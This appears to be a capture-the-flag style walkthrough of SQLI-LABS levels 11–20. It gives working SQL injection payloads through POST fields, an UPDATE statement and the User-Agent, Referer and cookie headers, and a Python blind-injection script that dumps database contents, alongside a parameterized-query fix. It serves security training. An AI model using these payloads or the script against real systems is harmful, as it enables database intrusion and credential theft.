SQLI-LABS Page1 11-20

0x0B Less-11

Error-based injection; the only difference is that the injection point is a POST parameter. The error-reporting functions can be used directly, or the regular union method.

  • Error-based injection: just change the injected statement afterwards
uname=admin' and updatexml(1,concat(0x7e,(database()),0x7e),1)#&passwd=123&submit=Submit
uname=admin' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=123&submit=Submit
uname=admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#&passwd=123&submit=Submit
  • Regular (union) injection
uname=admin' order by 2#&passwd=123&submit=Submit
uname=' union select database(),(select group_concat(table_name) from information_schema.tables where table_schema=(database()))#&passwd=123&submit=Submit
uname=' union select database(),(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')#&passwd=123&submit=Submit

0x0C Less-12

From the error message, the closing sequence is found to be "); the remaining steps are the same as in Less-11.

0x0D Less-13

From the error, the closing sequence is '), so error-based injection can be used directly. Since the response does not echo any queried column, boolean-based blind injection can be used as well.

  • Boolean-based blind injection
import requests

url = "http://192.168.44.214/sqli-labs/Less-13/"
_columns = []
_tables = []
_database = ""
resolver = "')"   # closing sequence for the Less-13 query; change this per level

data = {
    "uname": "1",
    "passwd": "123",
    "submit": "Submit"
}

def binarySearch(payload):
    # Find the smallest n for which "<payload> > n" is false, i.e. the value itself.
    # The range 1..144 covers both ASCII codes and the string lengths used here.
    maxn = 144
    minn = 1
    while minn <= maxn:
        middle = (maxn + minn) // 2
        payload1 = payload + ">" + str(middle) + "#"
        data['uname'] = payload1
        r = requests.post(url, data=data)
        # Less-13 shows slap.jpg when the login fails, i.e. when the condition is false
        if "slap.jpg" in r.text:
            maxn = middle - 1
        else:
            minn = middle + 1
    return minn

def getLength(func):
    payload1 = resolver + " or length({})".format(func)
    return binarySearch(payload1)

def getStr(func, length):
    # Recover the string one character at a time via its ASCII code
    mstr = ""
    for i in range(1, length + 1):
        payload = resolver + " or ascii(substr({},{},1))".format(func, i)
        tmp = binarySearch(payload)
        mstr += chr(tmp)
    return mstr

def getDatabase():
    global _database
    func = "database()"
    result = getStr(func, getLength(func))
    print("[*] database: " + result)
    _database = result

def getTableNum(database):
    func = "(select count(table_name) from information_schema.tables where table_schema='{}')".format(database)
    length = getLength(func)
    result = getStr(func, length)
    print("[*] table num = " + result)

def getTables(database):
    global _tables
    func = "(select group_concat(table_name) from information_schema.tables where table_schema='{}')".format(database)
    length = getLength(func)
    result = getStr(func, length)
    _tables = result.split(',')
    print("[*] tables: " + result)

def getColumns(table, database):
    global _columns
    func = "(select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}')".format(table, database)
    length = getLength(func)
    result = getStr(func, length)
    _columns = result.split(",")
    print("[*] columns from {}: ".format(table) + result)

def getInformation(table, column):
    info = {}
    for i in column:
        func = "(select group_concat({}) from {})".format(i, table)
        length = getLength(func)
        result = getStr(func, length)
        info[i] = result.split(',')
    # Print one row per record, with the columns separated by spaces
    for i in range(len(info[column[0]])):
        mstr = ""
        for j in column:
            mstr += info[j][i]
            mstr += "   "
        print(mstr)


if __name__ == "__main__":
    getDatabase()
    getTables(_database)
    getColumns(_tables[0], _database)
    getInformation(_tables[0], _columns)

0x0E Less-14

From the error, the closing sequence is "; the script is the same as in the previous level.

0x0F Less-15

There is no error message. Trying the universal password (login bypass) gets in successfully. The Less-13 script can be used for boolean-based blind injection, with the closing sequence replaced by '.

0x10 Less-16

Change the closing sequence in the Less-13 script to ").

0x11 Less-17

The passwd parameter can produce an error, so the error-based injection from Less-11 applies. There are of course other approaches: second-order injection can also be used, where the field update writes the result of a SQL expression into a field, which is then read back out.

  • Error-based injection
  • Using the data update
    When there is no error message, you can try inserting SQL statements; once the statement executes, the required data is saved into a field, and the information is obtained by viewing that field.
    uname=admin&passwd=',password=database(),username='admin&submit=Submit
    Submitting the above saves the database name into admin's password. Then go to a level that can display the password and query it
    to get the relevant information.
    Full query statement:
uname=admin&passwd=',password=database(),username='admin&submit=Submit
Query table names:
uname=admin&passwd=',password=substr((select group_concat(table_name) from information_schema.tables where table_schema=(database())),1,10),username='admin&submit=Submit
uname=admin&passwd=',password=substr((select group_concat(table_name) from information_schema.tables where table_schema=(database())),11,25),username='admin&submit=Submit
Querying column names and data works the same as in the earlier levels. Note that the length of data a field can hold is limited, so the query has to be split into several parts.
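The Less-17 update above works only because passwd is spliced into the SET clause as text. The following is an added example, not code from the original post: it rebuilds the vulnerable UPDATE and its parameterized form against a constructed in-memory SQLite table (an assumption; SQLite stands in for MySQL, so sqlite_version() plays the role of database() in the payload) and shows what each one actually stores.

```python
import sqlite3

# Added example (not from the original post). Constructed in-memory stand-in for
# the sqli-labs users table; SQLite replaces MySQL, so sqlite_version() plays
# the role of database() in the Less-17 payload.
PAYLOAD = "',password=sqlite_version(),username='admin"

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO users (username, password) VALUES ('admin', 'admin')")
    con.commit()
    return con

def vulnerable_update(con, uname, passwd):
    # Same shape as the Less-17 password reset: passwd is spliced into the SET
    # clause, so a quote inside it adds further assignments. When a column is
    # assigned twice, SQLite (like MySQL) keeps the rightmost assignment.
    sql = "UPDATE users SET password='%s' WHERE username='%s'" % (passwd, uname)
    con.execute(sql)
    con.commit()

def safe_update(con, uname, passwd):
    # Placeholders pass the values separately from the statement text, so the
    # same input is stored verbatim instead of being parsed as SQL.
    con.execute("UPDATE users SET password=? WHERE username=?", (passwd, uname))
    con.commit()

def read_password(con, uname):
    row = con.execute("SELECT password FROM users WHERE username=?", (uname,)).fetchone()
    return row[0]

def db_version():
    # What the injected sqlite_version() call evaluates to in this process
    return sqlite3.sqlite_version

def demo():
    vuln = make_db()
    vulnerable_update(vuln, "admin", PAYLOAD)
    leaked = read_password(vuln, "admin")   # the version string, written by the injection
    safe = make_db()
    safe_update(safe, "admin", PAYLOAD)
    stored = read_password(safe, "admin")   # the payload text itself, stored harmlessly
    return leaked, stored

if __name__ == "__main__":
    leaked, stored = demo()
    print("concatenated query stored:", leaked)
    print("parameterized query stored:", stored)
```

The same fix applies to every level in this post: the uname, passwd, User-Agent, Referer and Cookie values are all attacker-controlled and should reach the database only as bound parameters.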

0x12 Less-18

Logging in with any account shows the User-Agent (UA) information; changing the UA changes what is displayed, so this may be UA injection.

A single quote in the UA causes an error, so error-based injection can be used. Note that in the source this value is inserted into the database, so the parentheses must be closed.
payload:

1',1,updatexml(1,concat(0x7e,(database()),0x7e),1))#


0x13 Less-19

After login the Referer is displayed; entering a single quote produces an error. Only the injection point has changed; everything else is the same as Less-18.

0x14 Less-20

After logging in, look at the cookie.
Trying a single quote produces an error; error-based injection works and retrieves the data.
Union injection:

Cookie: uname=admin1' order by 4#   (get the number of columns)
Cookie: uname=adm' union select 1,2,database()#   (get the database name)
Cookie: uname=adm' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#